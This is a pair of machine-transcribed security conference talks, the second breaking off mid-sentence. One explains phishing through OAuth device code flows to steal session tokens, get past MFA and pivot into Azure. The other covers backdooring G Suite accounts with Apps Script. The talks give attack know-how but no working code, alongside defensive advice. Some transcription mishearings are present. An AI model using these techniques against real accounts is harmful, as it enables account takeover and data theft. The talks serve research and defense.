Hi, welcome. Today I'm going to be talking about new fishing attacks that exploit OOF authorization flows. My name is Janko Wong. I'm currently a researcher at Netscope. There are some of the areas that I've dabbled in and are interesting to me from a research perspective. So to recap some of the past about fishing, I'd like to just spend a minute talking about that so that we can understand some of the latest evolution of techniques. So in the beginning, certainly fishing was predominantly carried over SMTP. This is probably late 90s when we started to see fishing. Tacker is very focused on fake domains, creating them, hosting websites, maybe creating SSL certs as well to lend some validity to their fake sites and ultimately tricking the user into supplying their username and password. As mobile came along, more apps, app protocols came fishing then targeted those applications. So we got SMS fishes, smashes, IMs, chats. For the most part, a lot was the same but because of the limited UX and real estate, certain things like URL shortners being able to detect the SSL cert or even see the URL were different or challenges affecting the user as well as any software security controls in the picture. With cloud infrastructure providers, suddenly the attackers had an easier way to host their actual fake website. On top of that, the domains now and the SSL certs reflected those same popular cloud providers so the victims as well as the security controls had more of a challenge in detecting fake domains, fishes, certs, etc. So none of this is new. In this case, maybe the attackers trying to create something like Citibank's website hosted in Azure. The controls I alluded to and for the most part grew into a series of techniques up front. Detection of fishes using various link analysis, domains, URLs, the certs themselves, checking on the sender reputation, having thread and tell that helps with that so that the fish on an incoming basis could be blocked before reaching the user. Post user receiving an actual fish, some of the same techniques might be used to prevent the user from actually connecting on an HTTP request outbound to the fake website. There might be additional content inspection used to detect credentials within the payload as well, form, fields, etc. Ultimately, if credentials were hijacked, a set of controls like MFA and policies governing IP addresses that could be used with credentials also were applied. MFA especially was pretty effective at minimizing the impact of compromised credentials. So none of this is new. This has been sort of 10 or 20 years of fishing evolution. If I could simplify it at that. Now what's changed with some of the last few years? Well, as OAuth, which was introduced in 2013 as OAuth got more popular, driven a lot by security and the interaction of all these websites and web apps, that part of OAuth that dealt with authorization in a secure manner, became very popular and sort of has caused us to rethink both how to fish and how to defend against it. And OAuth at a high level, if you're not that familiar, involves the application. This could be the website or it could be a local application on the desktop or mobile often referred to as the client or device. Well, the application might request authorization from the user to do something and that could be approve, pay, up payment, login, so on. And it directs the user to identity platform. Part of OAuth model is to not have applications handle, know, store anything about the user credential. So in this case, there's a redirect. The user then authenticates as they would with their identity platform. And when we're talking about OAuth, it's really Azure AD or Google identity. That authentication process could be very secure and have MFA. Ultimately, the user is presented with some kind of authorization step, approve these permissions, approve this task. The permissions are called scopes in OAuth land. And if everything goes well, session tokens, OAuth session tokens are supplied back to the application. The application has these access tokens and can generate new ones with the refresh token and can use it to actually gain access to the resources of the user or to perform a task because they essentially have post authentication status. So as a user, this is familiar in various contexts. One is payments, you're shopping, you get to check out and PayPal, which is an OAuth provider, allows you websites to easily pay with PayPal websites. If you click through as a user, redirect the user to PayPal so that you can go through your authentication with MFA. And right now, we're dealing with PayPal as a user, so the original website does not see or have a chance to compromise your credentials. And as you complete the process with PayPal, you end up on the right with their version of an authorization or consent screen, which is, do you agree to pay that original website such and such money for whatever you are shopping for? There are other contexts, even technical tools like CLIs and Google Cloud have a login process, of course. And in this case, it creates a URL that you can copy and paste into a browser, but it's actually an OAuth flow. And in the browser, once you go to that URL, you're prompted to enter your username and password. And then you get to a consent screen saying, hey, the CLI, which is really registered as the Google Cloud SDK, once access your Google account, and it's asking for these permissions. If you go ahead and hit allow, you just confirm, then you see some confirmation messages and back on the command line, you might see a final message that, hey, you're now logged in. So initially phishing responded to this new authorization identity platform called OAuth with similar techniques, just here's a new login. Great, we have an OAuth login, but it's just another login, I'll spoof it. So a lot of this was business as usual from the phishing side. However, we did see some evolution where the code presenting that actual fake login would actually do a real-time validation check against the identity provider to validate that credential. And then based on whether it was valid or not, it might take different actions that would help maintain stealth. It might redirect to a valid domain login screen or something else, depending. And that might help prevent the user from maybe raising a flag manually. Also provide an opportunity to validate credentials up front so that you could do that check right away instead of later. The controls for the most part, I would say, have stayed the same because really the techniques have not changed much. So why do we care to maybe delve and research into the protocol deeper? Right, so far this hasn't made much difference. Well, obviously I wouldn't be talking if that were the case. Here's why attackers have dealt deeper and why from a research perspective it's worth us focusing on this. One is instead of targeting the username and password, we target the OAuth session tokens. There are some advantages there. The model of OAuth essentially allows a refresh of them and the defaults pretty much allow you to do that forever. The session token gives you the same power as the original credential. It has one advantage which is you don't have to re-challenge with MFA. If MFA is enabled, once they go through that manually, the tokens effectively are blessed and the refresh token just allows this unlimited ability to have a long duration credential. So getting access to session tokens effectively allows us to, quote, bypass MFA. The second reason is that all of this is rest enabled, so hijacking the actual tokens does not require compromise of an endpoint. We have these nice rest APIs. We have a complicated flow. There's the ability to insert us into the flow or perhaps gain access to tokens remotely, which is huge because tokens are not a new concept. They've been around since the beginning of the web. We've had web sessions and we've had session IDs kept in cookies or local storage and we've had web attacks, SSRF, that exploited those sessions to hijack them. We've had endpoint compromises that have also looked at grabbing or harvesting those tokens. However, there's a pretty high bar to take advantage of that because you would have to compromise that endpoint or do a browser attack. This is far easier. Far easier because we have rest APIs and we'll see that in the upcoming deep dives. So there have been actual attacks. One of them is called illicit consent grants, attacks that have exploited the protocol. Sorry, I didn't quite finish that. In the illicit consent grants, it's exploiting wider consensor privileges and tricking the user to approve them. This works with the attacker creating their own application, a fake application perhaps named close to an existing app. They register it in the identity platform. It could be their own account. They send out ultimately a fish to the user requesting broad scopes to some resource. So imagine it could be Google Drive, MySync, some name that seems plausible. I ask the user to give this application access, read and write to everything in Google Drive. If I can get the user to click, they'll approve these bigger scopes and a lot of tokens will be created and will be accessible by the user because the user that's part of the flow is specifying how to retrieve those tokens and they get actually pushed through a redirect URL to the application. So from a user perspective or victim perspective, the chance, you either have to identify or know that it's a fake application or an administrator security or IT administrator needs to be able to prevent users from clicking and approving these apps, app requests. So this happened and there's a reference here just in the last year or so of illicit consent grant tax. From a user perspective, they just see in a consent screen a list of permissions that might be wider or deeper than they expect and the controls against these are, as I mentioned, the administrators running the organization, watching the network, having the ability to prevent users from creating or registering fake apps in AD which might prevent an insider attack and they can prevent users from consenting and hitting accept. It changes this flow and they're not actually presented an accepted button. The administrators in control. I just wanted to point out that the Microsoft documentation has this nice 12 point numbered system. I did not add that. That's actually part of the documentation and they're explained pretty well within the documentation. Kudos to them. It's great as a researcher and I have to say as a user, it's extremely confusing to have 12 points to explain an OK dialogue. So this is where complexity is the enemy of security. So let's get to device code authorization which is really the flow I want to focus on today. What's the purpose? Briefly, to provide usability that is easier authentication authorization on a limited input device where you need some kind of authorization and authentication. Best examples of smart TV where you need to authenticate against your content subscription so you can get your movies on the TV. They all have this menu these days. Could be something, some device like a Roku or Apple TV. But the problem is if you were to enter that credential on the actual device, you'd be faced with something like remote control, completely heinous. So there's an RFC to solve that. Back in 2019, some smart people came up with a way to do that. When it's implemented, the application vendor, in this case the smart TV vendor, implements the device code flow and now the user has a better, a better flow. They're presented with a short URL. They're told to go to a different device that has a real keyboard or something that they can do. There's a relatively short URL to punch in there and a relatively short code to type in there and then you will go through a normal authentication or login process to prove this TV gaining access to, in this case your Netflix subscription. They even have a QR code capability so that your mobile device can even go to the URL directly. So that's all well and good. But the user gets when they follow URL or something like this, punching that short code, voila, everything's working. However, usability is one of the biggest drivers here and I have a saying that unusability is the father of insecurity. It drives less security and that is our opportunity to exploit. Because things get simplified, things get dropped, things get less secure or things just aren't looked at from a security viewpoint. So let's look at device code authorization a little bit deeper. So what really happens under the hood is a user is trying to log in or do some task. The device gets some user codes and sends the URL with that user code to the user so that they can authenticate and once they do OOF tokens are created which are then accessible from the device. So similar to what I said before. But to show how easy it is to abuse that or at least how difficult it is as a user to protect your credentials, I'd like to go through the demo now. Just a short note, Dr. Cinema has a great deal of information at his blog, O365 blog, super great resource. He has his tool set, AAD Internals, great stuff about Windows AD Outlook Office as well as OAuth in there. I highly recommend that. So let's jump into demonstration. So to lay the stage here on the left side will be the browser of the victim, the right side will be the terminal of the attacker and we'll actually go through a device code flow and sort of see the implications from both sides. So in this case we're logging into the standard URL for this company that ADD is part of Feast Health and we want to gain access first to Outlook. So we punch in name, password, get to, two factor, in this case it's software based, we punch in that code. If you want to stay signed in, we'll go through it and boom we're in Outlook. Now meanwhile the attacker independently is thinking of phishing, we'll start up a script, so running in demo mode, this is part of the open source software we are releasing concurrently. I want to point out a few things, one of the first steps that we're doing as part of the phishing is actually following the device code authorization flow. We're going to generate a code, if you look at a post, we're specifying a set of APIs, the graph APIs as our resource and we're actually using a client ID, this is the application client ID. When you create an application, the OAuth world, you have to get back an ID and a secret, we're actually reusing one, we didn't have to create an app to carry out this phish, this is the Outlook ID that we're reusing. When we execute this first step, we get back a user code that we're going to phish the user with along with the login URL, it's called the verification URL. We'll explain the other fields as we go, now I'm going to send out the phish and in a second, official peer, I'm going to pause and just say that after the phish is sent out, part of the device code authorization flow is to pull the identity platform, this case Azure, for OAuth tokens which will be created after the user logs in, so it will sit there waiting. In a second, there it is, on the left we see a new email, let's check it out, Ed has received an email from the Microsoft Office 365 product team, it is thanking Ed for being such a great customer and as part of that, he'll get one terabyte extra storage and increase file size, attachment file size of 100 megabytes, it's awesome, Ed can't resist and he types in the code. Now, let me go back and point out in the message, there's a real URL in here, it's Microsoft.com, nothing shady or funny, that is, it's an atrack link but it's actually pointing to the text, it's part of the device code authorization, so you can see that some phish detection might fail right off here on domain alone because it was Microsoft.com. Okay, so let's go back, as Ed follows that, punches in the supplied code in the phish and what's happening, he is being prompted to authenticate, okay. Since he had already logged into Outlook, it is cached in the browser, otherwise he would type in his username and password and perhaps MFA code and then get to this stage, I want to point out, here's the prompt, are you trying to sign into Microsoft Office, that Microsoft Office came from the use of the client ID in our phishing step initially, okay. We use the client ID and we get the title, alright, so there's continue and that's it for the user, they enter the code, they authenticated, they're done. Meanwhile, we are polling, the attacker script is polling, checking every five seconds, this is all part of the protocol for device code authorization, now that the user is logged in, we should have OAuth tokens and this will return in a few seconds with access tokens, session tokens, there it is. So let's note a few things, okay. Number one, what's in the response is scopes associated with the tokens, these are the permissions that we can, that we have access to with this token, the resource that tokens apply to is graphed API, we have an access token, we have a refresh token, okay, this is great, what can we do in the graph API, okay, you can see the indirection here, we put an application Microsoft Office, that's what the user thinks they've approved, we've got access to the graph API, which is a little bit broader than just, than just Outlook, so one thing we can do is get all AD users with that access token, running as AD or with his permissions, and there's a list of three users, AD included, David and Sandra, we will go to, just to compare, we'll go to AD's view, the victim, in Azure portal, we will actually go and, Azure Active Directory and check out the users just to convince ourselves this is real data matching, right, all matches, what else can we do, we can gain access to AD's email, so we just did a call with that same access token and got three emails, thank you from 365 team, some social security credit card numbers, all looks great, switch to Outlook as AD and you can see in the inbox, math pane on the left, the same emails, so this is great, through the graph API, we have access to email, some of AD, but to make it interesting, we want to show that you can actually pivot, move laterally, and trade in or rather, use the refresh token we have to gain a different access token with different scopes, different implicit scopes, so let's do one that allows us to get more at all of Azure, more of all of Azure resources, so what do we do here, we use the refresh token that we got under the guys of Microsoft Office against the graph API and we use that refresh token to get a new access token that has access to the resources in Azure, we are still using the Outlook client ID and the scope, we have to specify scope, before we didn't, we got a bunch of scope permissions, here we're using open ID which is a pretty basic scope, so the username, email, basic profile information, okay, and what we got back is interesting, we will press the resource or Azure, that's fine, look at the scope, it changed which is part of the protocol, it comes back with what you really have access to, we asked for open ID, we got back user impersonation, user impersonation is we can do everything the user can within this resource area of Azure, that happens to be a global administrator, we have hit gold, okay, we got a new access token, this access token has the scope privilege for this resource, so, and we didn't really have to supply anything special, I want to point out, no secrets, so what can we do with that, let's enumerate all resources in Azure, at least in the subscription that is part of, okay, long list, let's go back to the beginning, let's take a look at this, first we listed the subscription, that this user has access to, this token, just to convince ourselves we're in Ed's view in the portal, let's look at subscriptions, it is in fact Azure subscription one, great, a bunch of resources in that subscription, so let's look at all resources and compare it with what we retrieved, just to convince ourselves we're looking at real data and disks and computes, virtual machines that are SSH keys, there's a storage account for data, SA, JEH one is listed there, right there, and on that is a container, that storage account has a container, SJ, SC, JEH one, drilling into that container, our two files, SS1 and 3.txt, and in fact there is the container and there is SS1, SS3, so everything matches up and we've just enumerated everything, and since Ed's a global administrator we could do anything pretty much within the whole AD as well as the subscription, so that's the end of the fish, and the super interesting part from this view is the pivot, as well as that we had to supply, we did not need to supply any secrets along the way, it was really easy, let's switch back and look at device code authorization in a little bit more detail going back to the protocol itself, and let's figure out how we abused and carried out that demo, so let me highlight a few things, when we turn this into a fish, we pretty much use the standard device code authorization, but of course there is no initial login or task by the user, normally with a smart TV example the user is explicitly trying to hook up a streaming service and authenticate to it, so the user is expecting to be part of this flow, here the attacker is in control, the user is sitting minding the own business, we will as an attacker start with generating some user codes, and I want to point out this is a real snippet of all the key attributes in the REST API call, to generate a code and get the standard URL, I supply client ID which we've seen can be spoofed or rather be an existing client ID including the vendors in this case, it's Outlaw, I don't need to supply a secret here, and I can specify a resource, whether it's Graph API or Outlaw.com, and I immediately get back the information I need to start my fish, device code which I'll use later, user code which I'll give to the user login device, expiration time, I give that to the user and my fish, the user, if they're convinced this is the key step in the number four, but if they're convinced they go and authenticate, enter the code, go through authentication including MFA, and once they're done what's happened is the device is in the background polling and checking the identity platform, which will let it know once the user is finished logging in successfully, in which case a lot tokens will be created and returned as part of this polling API call. Look at all of the stuff that the application or the device has done, no secrets required, all public information in fact, client IDs are the most part easily determined for local clients and they're also logged so it's actually really easy in the Microsoft area to identify client IDs, no secrets are needed. So you can see that this is a little disturbing because if you squint and step back and ignore the text, we now have a process where I just need to convince the user to type in a code in a standard Microsoft or Google URL. If I do that, then just a note, I do know that I've mixed and matched Google URLs with Microsoft ones, but in all cases this is very real and often common, right? All of these attributes are similar across both and what I was saying is that to carry out this FISH, if you step back from it all, all you need to do is convince the user to go to a particular URL, enter in a code, authenticate. Both tokens will be created stored by the identity platform and you can go and retrieve them. That's a little bit crazy, right? You don't have to create your own infrastructure to do that, your own login page, your own application. You just had to point the user to the identity platform and give them a code and then you have your tokens. Once you have the access tokens, the pivot from a Microsoft perspective does look like this. You supply, you make a refresh token call and you get back a fresh set and here's where you can see the scope changes. We pointed this out during the demo and this is just repeated just to show that. So to summarize some of the key points, what's not just with Microsoft but common across all OAuth vendors is a device code authorization that has three aspects or qualities. You don't need server infrastructure. You don't need to register your own OAuth application. In fact, you can use an existing one, even the vendor's client application. The user does not see a consent screen, does not see a list of permissions. You're not prompted for that. They are prompted with this somewhat obscured. You want to sign into the application but that's it. Not, you want to grant the application access to everything in your email. All users in AD and your Azure as well as other services, they don't see that, right? Microsoft has a sense of implicit or default scopes. That is, in step two, the application when it starts this whole process, never supply scope. Google's a bit different. You do supply a scope. It just means that the scopes you get ultimately with OAuth tokens are things you never had to request. Then we end up getting user impersonation scopes in Microsoft, which allows us to do anything that the user can do. Microsoft allows this lateral move to other services or resources, I should say, as that user by being able to refresh a token for a different resource and get that back. Logging is limited and what is logged is when the attacker actually retrieves the OAuth token, their IP address is logged and it shows as an actual authentication or sign-in in the sign-in logs of Azure for this user. But this is limited because the lateral move is not logged. The lateral move being when we refreshed the token to get an Azure access token, that was not logged. Partial information. Here are some of the details in that line item or entry. You can see that application information ID is shown, but not much else. We know what user is operating here. The attacker did this retrieval of OAuth tokens for ED, but this just looks like an ED action. Nothing identifies that attacker other than the IP address on the prior view, which can easily be obfuscated through a proxy or VPN. So, can reasonably be done to protect against this or what would be encountered? Probably the most effective one would be blocking of verification URLs. That is the sign-in URLs that start this whole process off for the user. There are some standard ones for Google. Microsoft has two because the second one redirects to the third. So we could block those URIs. Security team could. But it is an imperfect solution because you actually might need to allow it for some valid logins. What is an example of that? Not a smart TV that could probably be against all policy, but it could be Azure. Azure's CLI does device code authorization. At least has one flow where it does verbatim device code authorization. So you have to be careful what is broken if you're on the defensive side. It just means that there's opportunities where the prevention may be imperfect or can't be put in place. There's some recommendation to use to block access or use of tokens based on IP or location or endpoint. And if that's it within control, that's a possibility. But IP allow lists often are a challenge as well as geolocation and other characteristics. So prevention is best described as imperfect but possibility. Preparation is difficult because the logging of anything related to OAuth tokens or temporary session tokens is very limited. Remediation does exist. Once you do know there's a problem with a user, you can revoke all OAuth tokens in Microsoft's wall. In Google, that is more obscure. You can do it, but it's not as obvious as a straight API call. There are some practical considerations to keep in mind. The main one is that the user or device code one generated is temporary. It will expire typically after 15 or 30 minutes. It's in the response of the REST API call. It just means the attacker can either in response play a phishing numbers game that is ignored and just blast off to a large number of users at a certain time in order to get them to respond if going over email would have its advantages and that the fish could be rich. It could sell a story. However, the timing may have a result in a low response to the fish. So practically speaking, though, you could choose other forms of communication including chat SMS that might create a more instant response because of how those applications are actually used in everyday interactions. So there's ways around this temporary time frame. You could also fall back and actually create some infrastructure, host your websites, and then have your fish. Instead of supplying a code, instead points the user to a website, the fake hosted website, to generate a code and get your discount code. So discount codes exist in that model today and it's probably reasonable that someone will fall through that. You could even have images dynamically generated that show codes and images are suggested because that would be allowed over JavaScript in actual mail browsers. They might be blocked but the user always has an option to load images and that could dynamically at that point in time generate a code and would give a fresh 15 minutes for the user to do that. So I point that out mainly because that is the one area from a practical implementation viewpoint would need to be accommodated. So there are some comparisons between Go Off Providers, in this case I took the two major ones Microsoft and Google. The main difference is there's more exposure on the Microsoft side because the handling of scopes are implicit and default and you can get quite a lot of permissions without even asking for them whereas on Google they really tightened up the scopes you get from device code authorization meaning access tokens can access user profile have limited Google Drive access mainly to files that the app itself has created and some YouTube profile info. So because of that the lateral movement is very different. On the Microsoft side it was easy as we saw in the demo to switch between or among a large number of services while in Google. It's pretty limited and strict. You get what you get with the initial scope. But all in all this drives towards maybe mentioning some ongoing research areas. The problem with OAuth is not that it's got flaws or is insecure. The problem is more that it's complicated. We talked about the normal OAuth flow, payments, examples, CLI login examples. We did a demo of how one other flow, the device code authorization flow can be easily exploited. There's three more flows which aren't quite as obvious as the device code authorization but in terms of having exposure but certainly are interesting areas to research because some of them have usability type requirements like implicit grants where things like consent can be bypassed because there's a way to get access tokens silently in the background. The default scopes that Microsoft has in their implementation is another area to delve further into just to see how those scopes are specified and returned because there may be areas to explore there. Consent is described, there's, let me preface that with, there is a model for incremental consent so that an application can present one at a time permissions or as the user one at a time for certain permissions as needed. But then it gets into dynamic user consent and some language that just hints that it's not as quite straightforward in terms of behavior as you might think and complexity breeds opportunities for exploit. The last area is particularly interesting in that browsers today allow usability features where you log into one application. Let's say you're in Chrome, you log into Gmail, then you suddenly open up a tab and put in that same browser that you are offered G Drive. You don't have to re-authenticate to G Drive even though that's a separate app, you're not even presented with a consent screen for either application. So already browsers today for usability provide this kind of auto log in and scope expansion, in the sense of switching scopes that don't involve users explicitly entering credentials every time and re-approving scopes and permissions. What does that mean? It just means usability might have short cut some parts of the protocol because it is OAuth underneath. So back in 2013, it's not all hypothetical, there was some opportunity to mimic what happened with certain Chromium browsers or Chrome browsers basically where you could have a token traded in and get more of a super or Uber token that could access a lot of information across apps without having to have gone through any re-authentication. Anyway, long story short, it's a very interesting area and beyond this list, the more important takeaway is that we have a complicated authorization protocol. We have differences in implementation as we've seen. Microsoft has a few quirks, Google has some different ones, results in different behavior, it's ubiquitous, it is as much a standard as anything on the internet, you can't avoid it, everyone's using it and it's distributed by nature over a large network with REST APIs. So this is a particularly interesting area for us to keep an eye on in terms of security risks and opportunities. So thank you, that is the end of the talk. We didn't cover in detail but there are open source tools that you can use to run the demo as well as do self fishing as well as explore what permissions are available. Once you do get responses to fishes, finally there is a list of references which is in the initial presentation but repeated here as well. So thank you for your time and if there's time for questions we'll take them now.
|
OAuth 2.0 device authentication gives users on limited-input devices like TVs an easier way to authenticate against a cloud website/app by entering a code on a computer/phone. This authentication flow leads to new phishing attacks that: - do not need server infrastructure--the login page is served by the authorization provider using their domain and cert - do not require a client application--application identities can be reused/spoofed - do not require user consent of application permissions Since the phish attacks hijack oauth session tokens, MFA will be ineffective as the attacker does not need to reauthenticate. The ability to defend against these attacks is hindered by limited info and functionality to detect, mitigate, and prevent session token compromise. I'll demonstrate these new phishing attacks, access to sensitive user data, and lateral movement. Defensive measures against these phishing attacks will be discussed, specifically the challenges in detection, mitigation, and prevention, and the overall lack of support for managing temporary credentials. Open-source tools have been developed and will be used to demonstrate how users can: - self-phish their organizations using these techniques - audit security settings that help prevent/mitigate the attacks REFERENCES: 1.0 Evolving Phishing Attacks 1.1 A Big Catch: Cloud Phishing from Google App Engine and Azure App Service: https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service 1.2 Microsoft Seizes Malicious Domains Used in Mass Office 365 Attacks: https://threatpost.com/microsoft-seizes-domains-office-365-phishing-scam/157261/ 1.3 Phishing Attack Hijacks Office 365 Accounts Using OAuth Apps: https://www.bleepingcomputer.com/news/security/phishing-attack-hijacks-office-365-accounts-using-oauth-apps/ 1.4 Office 365 Phishing Attack Leverages Real-Time Active Directory Validation: https://threatpost.com/office-365-phishing-attack-leverages-real-time-active-directory-validation/159188/ 1.5 Demonstration - Illicit Consent Grant Attack in Azure AD: https://www.nixu.com/blog/demonstration-illicit-consent-grant-attack-azure-ad-office-365 https://securecloud.blog/2018/10/02/demonstration-illicit-consent-grant-attack-in-azure-ad-office-365/ 1.6 Detection and Mitigation of Illicit Consent Grant Attacks in Azure AD: https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/ 1.7 HelSec Azure AD write-up: Phishing on Steroids with Azure AD Consent Extractor: https://securecloud.blog/2019/12/17/helsec-azure-ad-write-up-phishing-on-steroids-with-azure-ad-consent-extractor/ 1.8 Pawn Storm Abuses OAuth In Social Engineering Attack: https://www.trendmicro.com/en_us/research/17/d/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks.html 2.0 OAuth Device Code Flow 2.1 OAuth 2.0 RFC: https://tools.ietf.org/html/rfc6749#page-24 2.2 OAuth 2.0 for TV and Limited-Input Device Applications: https://developers.google.com/identity/protocols/oauth2/limited-input-device 2.3 OAuth 2.0 Scopes for Google APIs: https://developers.google.com/identity/protocols/oauth2/scopes 2.2 Introducing a new phishing technique for compomising Office 365 accounts: https://o365blog.com/post/phishing/#oauth-consent 2.3. Office Device Code Phishing: https://gist.github.com/Mr-Un1k0d3r/afef5a80cb72dfeaa78d14465fb0d333 3.0 Additional OAuth Research Areas 3.1 Poor OAuth implementation leaves millions at risk of stolen data: https://searchsecurity.techtarget.com/news/450402565/Poor-OAuth-implementation-leaves-millions-at-risk-of-stolen-data 3.2 How did a full access OAuth token get issued to the Pokémon GO app?: https://searchsecurity.techtarget.com/answer/How-did-a-full-access-OAuth-token-get-issued-to-the-Pokemon-GO-app ===
|
10.5446/54221 (DOI)
|
Thank you all for coming. This is Hacking G Suite, the power of dark app script magic. A little bit of background on myself, I'm Matthew Bryant. I go often by my hand on my editorial. I currently lead the Red Team effort at Snapchat. Outside of work, I also post occasionally about security on Twitter at IAM mandatory. Additionally, I also do hacking blog posts at my website, the hack the blog.com. So start us off with some context and background and give a base to what we'll be talking about today. So Google Workspace, for those of you who aren't familiar, essentially this is the new name that they've given to G Suite. I know it can be tough to keep up with all of Google's ever changing brand guidelines and stuff. I will still be referring to this as G Suite throughout the talk, just because I think most people are more familiar with G Suite than Google Workspace. But what G Suite is essentially is the suite of Google services that people use, things like Gmail, Drive, Calendar, all that stuff. This is available both for regular users, personal individuals as well as companies, enterprises. This allows people to sort of, if it's a company for example, they can collaborate online to get work done using all of the various Google services. And as of the time of this research, they were boasting over two billion users. So a ton of people use this stuff. So for those of you who aren't familiar with Apps Script, Apps Script is essentially this basically JavaScript language which is used to write these serverless JavaScript apps that run on Google infrastructure. And it's kind of this custom way to build apps where it's highly optimized for automated Google services. It comes with a lot of really useful libraries when it comes to automating everything from Google Docs to Gmail to any sort of Google service you can think of. And on top of having all these pre-built libraries, it has the seamless integration with Google's app registration system and sort of their OAuth system. So normally when you set up a new OAuth app with Google, you have to set up the callback URI and configure your app to work with it and all sorts of these things. But when you use Apps Script, that's all magically done for you. All this authorization stuff is just sort of handled and it sort of automatically takes care of it. So it also offers a variety of triggers that you can use to start your little scripts that you can use to start your little scripts. So everything from somebody hits a web endpoint that kicks off a script to they've opened a Google Doc and somebody's running at the beginning of that to schedule a cron style of things. We have scheduled execution jobs and stuff of that nature. This is an example screenshot of the Apps Script editor. You can see it's actually a pretty full IDE environment. It has everything from code completion to break points, debugging, all the stuff that you'd kind of expect from your regular dev. So Google's OAuth system is very similar to a lot of the other OAuth systems out there. Essentially the idea is it's a system that's built to sort of allow these third party apps built by whatever individuals to request access to resources that Google users have in their account. So for example, maybe I have some Google Docs in my account and I want to automate something for these Google Docs using a third party app. This allows me to basically delegate access to my Google Docs to this third party app to do that for me. So these permissions to these resources, they're essentially known as scopes and there are over 250 of them. So these are for all of the various Google services that you can think of. So everything like BigQuery, Gmail, Google Docs, stuff like that. The way that it works is you sort of at your app will redirect them to an authorization prompt that gives them a brief summary of what you're requesting permission-wise and the user can think it over and decide, yep, I'm going to allow that or no, I'm going to reject that. And if they allow it, essentially your app can send it some tokens which you can then use to talk to these APIs authenticated as the user. So as I mentioned that prompt earlier, this is what that looks like. You have a sort of a human readable little summary here. In this case, this example app, it has, hey, this is going to request access and if you allow it, it will have access to your Gmail stuff. It will have access to Google Cloud and everything in it. And also, it's asking for permission to sort of run when you're not present. So it's not just like a one-time thing. In the future, it could just keep running indefinitely. So tying all these concepts together and thinking about things at a higher level. This becomes a pretty attractive option when it comes to targeting organizations or companies that are on the G Suite stack. Apps Script becomes a pretty attractive option for things like phishing, like target spear phishing as well as, say, you've already compromised, an individual employee account in G Suite org, it becomes a very attractive option for backdooring that account as well. And the reason why it's an attractive option is because if you have an Apps Script implant, it's actually sort of outside of the eyes of all the regular machine monitor controls that run on people's end machines and their laptops and stuff. So regular antivirus, their endpoint detection tooling and sort of on-device monitoring, none of that's really effective here because, again, it runs completely on Google's infrastructure. It's like a total service environment. So they don't have any visibility into that at all. And even better, if your victim wipes their laptop for some reason, your implant is completely unaffected and it totally remains with philaxes to their account. So another thing that's interesting if you think about some of these companies that have sort of these extremely hardened environments, Apps Script becomes an interesting option even then. So what I'm talking about, when I say hardened environments, what I mean is companies with things like mandatory hardware universal do factor on logins. So places where traditional credential phishing just isn't going to work because they have a hardware key that they actually have to hit in order to log in. Things like they have hardened Chromebooks with lock down enterprise policy so you can't get a binary implant running on there. You can't even get the Chrome extensions potentially if they have lock down enterprise policy and they have hardware station and all that other good stuff. So super lock down environments. And so getting around these measures, we'll have to think a little bit more clever than your average attacker. This isn't like the casual Windows networking style pentests that are potentially more common. This is like a completely sort of unique environment and so we'll have to be a little bit more unique in how we think about it and how we approach these things. So I'm going to go into some historical precedent here. One thing that I think is a particularly interesting example is what is the attack that happened a few years ago which was essentially basically built around using Google's OAuth and API system. Some of you may recognize this screenshot here. If you were one of the individuals that was affected by this. But essentially what was later dubbed is the Google doc worm. So the way that this worked is essentially this worm would basically send these phishing emails like this. And you know, this is from somebody you personally knew coming from your actual email address and would say like, hey, your friends has led you to view a document and it would give you this button to like sort of like, okay, let's open that document. But when you actually went and did that, it would actually present you with this OAuth prompt here and it says like, hey, Google Docs wants to have access to read, send, delete a manager email and also access all your contacts. Now, of course, for security people watching this, they're like, I would never approve that prompt. But for the average user, they're sort of like looking at this and they're like, okay, Google Docs wants access to my Gmail contacts. Yeah, I mean, I thought they would already have that. Sure, why not, right? And they would probably go through and just go ahead and approve this. So it's sort of like very, very convincing attack for a lot of regular computer users. Of course, if they did do that and they did authorize this app to have access to their Google account, what it would immediately then go do is it would use the contact access to essentially get their 1000 most recent contacts, their emails, their friends and coworkers and stuff like that. And it would send out this exact same phishing email as them to all of their friends and contacts. And this would basically repeat the cycle where they would then get that phishing email that we saw before, right? The impact this attack was actually pretty impressive. It ended up spreading like wildfire and essentially it actually affected over a million Google users. And this is everything from like your personal Google users like you and me, to sort of the big enterprise business users, you know, sort of the G Suite organizations. And, you know, Google sort of rapidly responded to this actually like they had really good response time, they did everything from like killed the emails that were spreading around, you know, killed off all the apps and stuff like that. And they did all this in a couple hours. And after doing some posts more analysis on, you know, basically the JavaScript that was used to control and run this attack, it turns out the coding for it was actually like pre amateur, right? It wasn't like this advanced crazy nation state thing that most people assume. And it essentially looked like it was only collecting email addresses. So all things considered, this attack could have been, you know, much, much worse. It almost seemed as if, you know, some ways that it was actually like unfinished. So, you know, let's break down this attack into its kind of core components here. One, you know, I would say like a fairly advanced thing trait that they did is they they did think ahead and they had multiple rotating apps, they registered multiple OAuth apps ahead of time. And they sort of ended up using them along with different domains to essentially prevent the easy case of Google just like blocking their app or blocking a given domain, right? They had to instead track down all of the apps and all the domains and block all of them to prevent this from spreading. It made use of some Unicode characters. You know, you saw earlier it was the app name was actually called Google Drive. That was because they were basically evading some filters which normally prevent you from setting stuff like Google on the name of the app by using Unicode characters which look exactly the same as their ASCII equivalents. So it was like Google would like maybe a Swedish O for example. And of course, you know, it used the social engineering and the phishing scheme that we saw which was, you know, quite convincing to people. And it actually, you know, it's self propagated in sort of the old school email spam style, right? So it affects somebody, send to all of their contacts, you know, some of their some of your friends end up like falling for it, you know, and then they send to all of their contacts as well. Except, you know, unlike the email worms of old, this used some of the more modern O style authentication and authorization to actually carry out these attacks as opposed to like old school credential harvesting and, you know, stuff like that. So as you can imagine, this was like pretty shocking to a lot of companies, a lot of users. And so Google made some pretty quick changes and mitigations after this happened. Around two months later, they introduced a G Suite admin control for sort of administration administrators of companies to essentially lock down their orgs. And the way that this would work is essentially, you know, they could publish it, they could basically set a setting that says like, none of my employees are allowed to grant access to any of their Google, you know, account data for their employee account, unless it's for one of these explicit OAuth apps that I've explicitly allowed. So this would allow you to lock down to prevent, you know, say this war happened again, you know, their place to straight up would not be able to grant these permissions to their account because it would be blocked unless it was whitelisted into their, you know, under his policy. And, you know, Google later introduced what are called, you know, sort of sensitive restricted scopes, they basically labeled a bunch of, you know, these permissions, as I mentioned before, as like either sensitive or restricted depending on like the kind of data they would grant. And in addition to that, they 